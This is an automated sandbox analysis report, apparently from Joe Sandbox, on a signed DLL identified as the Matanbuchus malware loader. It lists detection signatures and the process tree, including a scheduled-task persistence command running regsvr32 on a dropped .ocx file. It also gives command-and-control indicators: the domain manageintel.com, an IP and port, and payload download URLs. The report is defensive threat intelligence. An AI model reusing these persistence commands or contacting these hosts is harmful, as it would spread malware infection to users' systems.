Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
smphost.dll

Overview

General Information

Sample Name:smphost.dll
Analysis ID:562835
MD5:fc484855692f2a7d1eae090086a1eb72
SHA1:2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256:e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
Tags:dllmatanbuchusSATURNCONSULTANCYLTDsigned
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Uses known network protocols on non-standard ports
Sigma detected: Regsvr32 Network Activity
Sigma detected: Suspicious Call by Ordinal
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a connection to the internet is available
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6120 cmdline: loaddll32.exe "C:\Users\user\Desktop\smphost.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4764 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6212 cmdline: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 3576 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • schtasks.exe (PID: 4532 cmdline: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: 15FF7D8324231381BAD48A052F85DF04)
      • WerFault.exe (PID: 6348 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6256 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6760 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5388 cmdline: rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • regsvr32.exe (PID: 5808 cmdline: C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 6460 cmdline: -e C:\ProgramData\6\5507.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • regsvr32.exe (PID: 1264 cmdline: C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 2016 cmdline: -e C:\ProgramData\6\5507.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: DNS queryAuthor: Dmitriy Lifanov, oscd.community: Data: Image: C:\Windows\SysWOW64\regsvr32.exe, QueryName: manageintel.com
Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4764, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1, ProcessId: 6212

Persistence and Installation Behavior

barindex
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, CommandLine: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 3576, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx, ProcessId: 4532

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: smphost.dllVirustotal: Detection: 8%Perma Link
Source: http://manageintel.com/WUzZRUBQje/Auth.phpAvira URL Cloud: Label: malware
Source: smphost.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
Source: unknownHTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49841 version: TLS 1.2
Source: smphost.dllStatic PE information: certificate valid
Source: Binary string: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\Release\BhJM.pdb source: regsvr32.exe, 00000002.00000002.437623410.000000007FC00000.00000040.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000002.00000002.437475087.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E9EED8A FindFirstFileExW,2_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 38_2_6F84ED8A FindFirstFileExW,38_2_6F84ED8A

Networking

barindex
Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 185.14.31.158 32710Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: manageintel.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 32710
Source: unknownNetwork traffic detected: HTTP traffic on port 32710 -> 49855
Source: Joe Sandbox ViewASN Name: ITLDC-NLUA ITLDC-NLUA
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E9E8210 InternetCheckConnectionA,InternetOpenUrlA,InternetReadFile,WriteFile,InternetCloseHandle,2_2_6E9E8210
Source: global trafficHTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global trafficTCP traffic: 192.168.2.3:49762 -> 185.14.31.158:32710
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: